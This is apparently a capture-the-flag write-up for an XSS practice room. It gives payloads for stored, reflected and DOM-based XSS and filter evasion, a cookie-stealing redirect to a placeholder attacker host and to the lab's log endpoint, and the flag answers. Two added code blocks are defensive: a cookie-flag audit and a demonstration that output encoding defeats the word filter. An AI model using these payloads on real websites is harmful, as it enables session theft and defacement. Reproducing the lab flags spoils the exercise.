Cross-Site Scripting

Task 1 Introduction

Answer the questions below

Read the introduction.

No answer needed…


Task 2 Deploy your XSS Playground

Answer the questions below

Deploy the machine and navigate to http://<IP>

No answer needed…


Task 3 Stored XSS

Answer the questions below

The machine you deployed earlier will guide you through exploiting some cool vulnerabilities that stored XSS has to offer. There are hints for answering these questions on the machine.

No answer needed…


Add a comment and see if you can insert some of your own HTML.

Doing so will reveal the answer to this question.

To answer this question, I took an HTML img tag and submitted an image to the comments box like so:

<img src="https://i.insider.com/5ed7f5e0aee6a80f0b0cadb6" alt="BOO" width="500" height="600">

Answer = HTML_T4gs


Create an alert popup box appear on the page with your document cookies.

I already knew that we could create a popup using the script tags, but I had to look up how to read cookie data in JavaScript. https://www.w3schools.com/js/js_cookies.asp explains this well and we can see that “document.cookie” is what's needed. So I added this to script tags with “alert” to create the popup.

<script>alert(document.cookie)</script>

Answer = W3LL_D0N3_LVL2


Change “XSS Playground” to “I am a hacker” by adding comments and using Javascript.

To find the name of the element we want to change I right-clicked on the word and chose “inspect element”. I could then see that the id was “thm-title”.

After googling how to change a header using JavaScript I found this link https://www.w3schools.com/js/js_htmldom_html.asp that explains the code needed. Then I just changed it to match the id of our header and the text I wanted to input.

<script>document.getElementById("thm-title").innerHTML = "I am a hacker";</script>

Answer = websites_can_be_easily_defaced_with_xss


Stored XSS can be used to steal a victim's cookie (data on a machine that authenticates a user to a web server). This can be done by having a victim's browser parse the following JavaScript code:

<script>window.location='http://attacker/?cookie='+document.cookie</script>

This script navigates the user's browser to a different URL, and this new request includes the victim's cookie as a query parameter. When the attacker has acquired the cookie, they can use it to impersonate the victim.
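As an added note (this is not part of the room or the write-up above), the cookie flags decide how much of that theft is even possible. The helper below parses a Set-Cookie header, reports which hardening flags are missing, and shows what document.cookie would expose; the header values are constructed placeholders, not the playground's real session cookie.

```javascript
// Added example (not from the write-up): audit a Set-Cookie header for the flags that
// limit what the cookie-stealing payload above can reach. Sample values are constructed.
function parseSetCookie(header) {
  const [pair, ...attrs] = header.split(';').map((s) => s.trim());
  const eq = pair.indexOf('=');
  const cookie = { name: pair.slice(0, eq), value: pair.slice(eq + 1),
    httpOnly: false, secure: false, sameSite: null };
  for (const attr of attrs) {
    const [key, val = ''] = attr.split('=');
    const k = key.trim().toLowerCase();
    if (k === 'httponly') cookie.httpOnly = true;
    else if (k === 'secure') cookie.secure = true;
    else if (k === 'samesite') cookie.sameSite = val.trim().toLowerCase();
  }
  return cookie;
}

// What document.cookie would expose for these Set-Cookie headers: the browser hides
// HttpOnly cookies from script, so only the rest could leak through an XSS payload.
function visibleToScript(headers) {
  return headers.map(parseSetCookie).filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`).join('; ');
}

// Hardening findings for a session cookie; an empty list means all three flags are set.
function auditSessionCookie(header) {
  const c = parseSetCookie(header);
  const findings = [];
  if (!c.httpOnly) findings.push('missing HttpOnly: readable via document.cookie');
  if (!c.secure) findings.push('missing Secure: also sent over plain HTTP');
  if (!['lax', 'strict'].includes(c.sameSite)) findings.push('SameSite not Lax or Strict');
  return findings;
}

// Constructed headers with a placeholder session id (not the playground's real cookie).
const WEAK_COOKIE = 'session=PLACEHOLDER_SESSION_ID; Path=/';
const HARD_COOKIE = 'session=PLACEHOLDER_SESSION_ID; Path=/; HttpOnly; Secure; SameSite=Lax';
console.log(auditSessionCookie(WEAK_COOKIE));             // three findings
console.log(visibleToScript([WEAK_COOKIE, HARD_COOKIE])); // only the weak cookie is readable
```

HttpOnly only stops the cookie being read; script running in the page can still send requests that carry it (which is what the “post a comment as Jack” step below does by hand in Burp), so encoding the comment on output is the fix that removes the XSS itself.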

Take over Jack’s account by stealing his cookie, what was his cookie value?

We need to think about how to find Jack’s cookie… By running the website through Burp we can see a /logs URL…

This suggests that the website is keeping, or is capable of keeping, access logs, so let's go to that page.

We see a page that says that anything that requests /log/{text} will be logged here… so let's alter the JavaScript that THM provides to redirect via /log/ … like so:

<script>window.location='http://10.10.100.216/log/?cookie='+document.cookie</script>

Answer = s%3Aat0YYHmITnfNSF0kM5Ne-ir1skTX3aEU.yj1%2FXoaxe7cCjUYmfgQpW3o5wP3O8Ae7YNHnHPJIasE


Post a comment as Jack.

To do this we can record our request using Burp, alter it, then forward on the manipulated request.

The part we want to manipulate is our cookie, and we want to swap this out for the cookie we found in the previous question. The image below shows how this would look.

(Note that the *****comment and “Original Cookie” would be removed before forwarding the call)

When we forward this call in Burp we see the following:

Answer = c00ki3_stealing_


Task 4 Reflected XSS

Answer the questions below

Craft a reflected XSS payload that will cause a popup saying “Hello”.

Similar to before, we can use the HTML <script> tags to do this.

<script>alert("Hello")</script>

Answer = ThereIsMoreToXSSThanYouThink


Craft a reflected XSS payload that will cause a popup with your machine's IP address.

I used the hint to find out that window.location.hostname is the JavaScript to give us the hostname, which in this case is the IP … therefore our code looks like this:

<script>alert(window.location.hostname)</script>

There is then a second popup displayed:

Answer = ReflectiveXss4TheWin


Task 5 DOM-Based XSS

Answer the questions below

Look at the deployed machine's DOM-Based XSS page source code, and figure out a way to exploit it by executing an alert with your cookies.

To “alert with cookie” we can use the same code as we have used before. But to exploit the DOM I had to research a little. The hint suggested using the “mouseover” event, so our command looks like this.

"onmouseover="alert(document.cookie)"

After entering this into the text field and clicking “Update” we can see our cookie as planned.

If we click OK we then see another popup with our flag.

Answer = BreakingAnElementsTag


Create an onhover event on an image tag that changes the background color of the website to red.

For this I had to Google a bit… I don’t know much about JavaScript so used this site to do some research on DOM events:

https://www.w3schools.com/jsref/dom_obj_event.asp

I couldn’t find anything for “onhover” so decided to try and manipulate the same command used in the previous question.

I stripped out the cookie command from before and then looked for an event option that would change the background colour of a DOM element.

W3Schools looks like it might have the answer…

Let's try this:

After some playing around I changed the ” around red to single quotes ‘ …

test" onmouseover="document.body.style.backgroundColor = 'red'";

This worked and showed us the flag (and changed the BG colour)…

Answer = JavascriptIsAwesome


Task 6 Using XSS for IP and Port Scanning

Answer the questions below

Understand the basic proof of concept script.

Then create a file on your computer with the script, modify it to suit your network and run it. See if it picks up any of your devices that have a web server running.

No answer needed…


Task 7 XSS Keylogger

Answer the questions below

Create your own version of an XSS keylogger and see it appear in the logs part of the site.

No answer needed…


Task 8 Filter Evasion

Answer the questions below

Bypass the filter that removes any script tags.

<img src="blah" onerror=alert("Hello") />

Answer = 3c3cf8d90aaece81710ab9db759352c0


The word alert is filtered, bypass it.

<img src="blah" onerror=confirm("Hello") />

Answer = a2e5ef66f5ff584a01d734ef5edaae91


The word hello is filtered, bypass it.

<img src="blah" onerror=alert("HHelloello") />

Answer = decba45d0eff17c6eedf1629393bee1d


The filter in challenge 4 removes the following:

  • the word “Hello”
  • script
  • onerror
  • onsubmit
  • onload
  • onmouseover
  • onfocus
  • onmouseout
  • onkeypress
  • onchange

<img src="blah" ONERROR="alert('HHelloello')" />

Answer = 2482d2e8939fc85a9363617782270555
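The reason the Task 8 filters fall over, and why the Task 5 attribute break-out works at all, is the same: the page is stripping words instead of encoding for the context the input lands in. The block below is an added example, not the write-up's or the playground's code; the blacklist functions are a hypothetical reconstruction of the behaviour described above (the real filter source is not on the page), and the payloads are the ones quoted in the write-up.

```javascript
// Added example (not the write-up's or the playground's code): a reconstruction of
// the case-sensitive word-stripping filter Task 8 describes, beside the real fix.
const makeBlacklist = (words) => (s) => words.reduce((o, w) => o.split(w).join(''), s);
const challenge1 = makeBlacklist(['script']);
const challenge4 = makeBlacklist(['Hello', 'script', 'onerror', 'onsubmit', 'onload',
  'onmouseover', 'onfocus', 'onmouseout', 'onkeypress', 'onchange']);
// The fix: encode the HTML metacharacters, safe in body and quoted-attribute contexts.
const ENT = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
const encodeHtml = (s) => s.replace(/[&<>"']/g, (c) => ENT[c]);
// Demo-sized tag/attribute scanner (not a full HTML tokenizer): returns the on*
// attributes a browser would really see, honouring quoted attribute values.
function handlerAttributes(html) {
  const found = [];
  const ws = (c) => /\s/.test(c || '');
  let i = 0;
  while (i < html.length) {
    if (html[i++] !== '<' || !/[a-z]/i.test(html[i] || '')) continue;
    while (i < html.length && /[\w-]/.test(html[i])) i++;           // tag name
    while (i < html.length && html[i] !== '>') {
      while (ws(html[i]) || html[i] === '/') i++;                    // attribute separators
      let name = '';
      while (i < html.length && !/[\s=>/]/.test(html[i])) name += html[i++];
      while (ws(html[i])) i++;
      if (html[i] === '=') {                                         // attribute value
        while (ws(html[++i]));
        const q = html[i];
        if (q === '"' || q === "'") i = (html.indexOf(q, i + 1) + 1) || html.length;
        else while (i < html.length && !/[\s>]/.test(html[i])) i++;
      }
      if (/^on\w+$/i.test(name)) found.push(name.toLowerCase());
    }
    i++;                                                             // closing '>'
  }
  return found;
}
// Payloads quoted above, each in the rendering context the page used them in.
const CASES = [
  ['challenge1', challenge1, (s) => `<p>${s}</p>`, '<img src="blah" onerror=alert("Hello") />'],
  ['challenge4', challenge4, (s) => `<p>${s}</p>`, '<img src="blah" ONERROR="alert(\'HHelloello\')" />'],
  ['task5-attr', (s) => s, (s) => `<input type="text" value="${s}">`, 'test" onmouseover="document.body.style.backgroundColor = \'red\'"'],
];
// Handlers that survive the playground's filter versus output encoding, per case.
function compareDefences() {
  return Object.fromEntries(CASES.map(([name, filter, render, payload]) => [name, {
    blacklist: handlerAttributes(render(filter(payload))),
    encoded: handlerAttributes(render(encodeHtml(payload))),
  }]));
}
console.log(compareDefences());
```

Every case keeps a live handler after the word filter (case mismatch, nested words, or a quote closing the attribute early) and none after encoding, which is why a blacklist is a detection aid at best and output encoding is the fix.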


Task 9 Protection Methods & Other Exploits

Answer the questions below

Download and experiment with BeEF with the XSS playground.

No answer needed…


Take a look at XSS-Payloads.com, download one interesting looking payload and use it on the XSS playground.

No answer needed…

